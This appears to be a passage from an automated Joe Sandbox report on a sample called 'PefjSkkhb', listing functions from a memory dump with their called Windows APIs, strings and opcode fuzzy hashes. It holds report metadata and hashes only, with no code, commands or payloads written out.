                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                    • API String ID: 2280078643-1018135373
                                                                                                                                                                                                                    • Opcode ID: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                                                                                                                                                                                    • Instruction ID: bd9570c25c25cd0158ebeb250138bd7f36090143f5abfc9fede4a65a6d7b4859
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36212C7664968182E770DF12E44026E77B1F785BA4F480226DF9D93B95CF3EE886CB40
                                                                                                                                                                                                                    Function 00007FF656D2C110 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                    • API String ID: 33631002-4108050209
                                                                                                                                                                                                                    • Opcode ID: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                                                                                                                                                                    • Instruction ID: 17815e9a37245089770a26193c21e91a7d0da0183aacc523fe040db94cbf95d5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24218332618B80C6D3608F21E88469A77B4F789794F14433AEB9D53B94DF3DDA95CB00
                                                                                                                                                                                                                    Function 00007FF656D4AF20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF656D12DD1), ref: 00007FF656D4AF37
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF656D12DD1), ref: 00007FF656D4AF4F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 2574300362-1816364905
                                                                                                                                                                                                                    • Opcode ID: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                                                                                                                                                                                    • Instruction ID: ab14d16de552ab24b9743d24726cc007e5aaa5e3eeffe2afcdd07dc223a353f8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32F01C61A0AB0181EF08CB50E85437433E4FB08B49F880B35C91C96364EFBED998C340
                                                                                                                                                                                                                    Function 00007FF656D510C8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                    • API String ID: 2574300362-4033151799
                                                                                                                                                                                                                    • Opcode ID: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                                                                                                                                                                                    • Instruction ID: 27b00fa8caae8d42aa1db818230ac67725339d860cd781729a0edaf36ba46d2d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0E0ED21A05B0682EF14CB10E81877823A0EB18B55F4C0B75C91D95360FF7ED595C740
                                                                                                                                                                                                                    Function 00007FF656CB6D64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 2574300362-3689287502
                                                                                                                                                                                                                    • Opcode ID: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                                                                                                                                                                                    • Instruction ID: 4e01c643b3fa14330197b657fa5443988a5f0dc79eac91c4034067a093787b93
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10E0ED61906F0681EF15CF61E41436423E4FB08B48F980A35C95D953A0EFBEE5D4C340
                                                                                                                                                                                                                    Function 00007FF656CB6D1C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 2574300362-1355242751
                                                                                                                                                                                                                    • Opcode ID: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                                                                                                                                                                                    • Instruction ID: 1db45207b434b5bdd647fd6a9e68b0c43b4b129cdd30039cac2821aa9033e092
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EAE0ED61905B0681EF15CB61E4143A823E4FB08B48F980A34C95D95364EFBED9D4C340
                                                                                                                                                                                                                    Function 00007FF656D232F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 2574300362-192647395
                                                                                                                                                                                                                    • Opcode ID: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
                                                                                                                                                                                                                    • Instruction ID: 365c8c745f5672056fd18e2ae50342493f600db8ab895f17b26f76094e7d0056
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EE01261905B0281EF14CB50E41436433E0FB08B48F880B36C91D95360EFBED694C341
                                                                                                                                                                                                                    Function 00007FF656D1B7E4 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                                                                                                                                                                                    • Instruction ID: 9ce9d0511aff975cdcb173b90cc28b7e0a6691c605b6e8befc8b6c14aa1f07cb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DD11867B04B5686EB148F2AC4902AD37B0FB88F88B154A32DF4D97B58DF7AD845C310
                                                                                                                                                                                                                    Function 00007FF656D479D8 Relevance: 6.3, APIs: 4, Instructions: 282COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                                                                                    • Opcode ID: f7e9a6a1c2f8c019007800361108cca29dc074ba0bb03e63b32f82c3ddf48b44
                                                                                                                                                                                                                    • Instruction ID: 5a5b0365d02bdb364d3ea0b0c790ad9e3738d4c9445b3f1d8a333cb5866fba24
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f7e9a6a1c2f8c019007800361108cca29dc074ba0bb03e63b32f82c3ddf48b44
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02D16A76B08B419AEB50DFA1D4801EC33B1FB44788B484A36DE4DA7BA9DF79D519C380
                                                                                                                                                                                                                    Function 00007FF656D4EB34 Relevance: 6.2, APIs: 4, Instructions: 156processCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2000298826-0
                                                                                                                                                                                                                    • Opcode ID: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                                                                                                                                                                                    • Instruction ID: 12ff0b73ebf708ee125a541c9edbc1194be2c230cf66c3403f63753be1637feb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E718036A18B8186E700DB21E4447AE77B0FB88B88F844231EE8D57765DF7DD545C740
                                                                                                                                                                                                                    Function 00007FF656D5D88C Relevance: 6.1, APIs: 4, Instructions: 134windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$ClientMessageMoveRectScreenSend
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1249313431-0
                                                                                                                                                                                                                    • Opcode ID: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
                                                                                                                                                                                                                    • Instruction ID: 194236a969a74f27cb80468dbe219c9c76837f092a185875fc1e1954840ac84d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F51A532A04A4289EB50CF25D4805BD3761FB94B98F594B36DE2DE3B94DF3AE881C710
                                                                                                                                                                                                                    Function 00007FF656D2BAB8 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2267087916-0
                                                                                                                                                                                                                    • Opcode ID: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                                                                                                                                                                                    • Instruction ID: cdf4ffc98b2cea3067f60627e92631d7094cf4a6300dc85d3ae6f6400ab9938c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D519E22B05A1285EB508F62D8805AC63B5FB44B98F984B35DE4DA37A8DF7ED542C300
                                                                                                                                                                                                                    Function 00007FF656D443C8 Relevance: 6.1, APIs: 4, Instructions: 126networkCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$socket
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1881357543-0
                                                                                                                                                                                                                    • Opcode ID: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
                                                                                                                                                                                                                    • Instruction ID: b03c741f619a5933f714a9e2311a6ae83a87d159c40eb77a176db5849995cfa2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 374191A171868285EB14AF12E40467967A0FB89FE4F484634DE6EA7BA6CF7DD041C740
                                                                                                                                                                                                                    Function 00007FF656D35DA4 Relevance: 6.1, APIs: 4, Instructions: 108fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3321077145-0
                                                                                                                                                                                                                    • Opcode ID: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                                                                                                                                                                                    • Instruction ID: 1bf5a7a9f9800cd03064e3a2b60695b2d9707de346da7fdba7149343bb7e62b8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9741B566B08B8681DB14AF26E49106D7360FB88FD4B4C9532DF4E97766DE3DE480C740
                                                                                                                                                                                                                    Function 00007FF656D5F014 Relevance: 6.1, APIs: 4, Instructions: 107windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
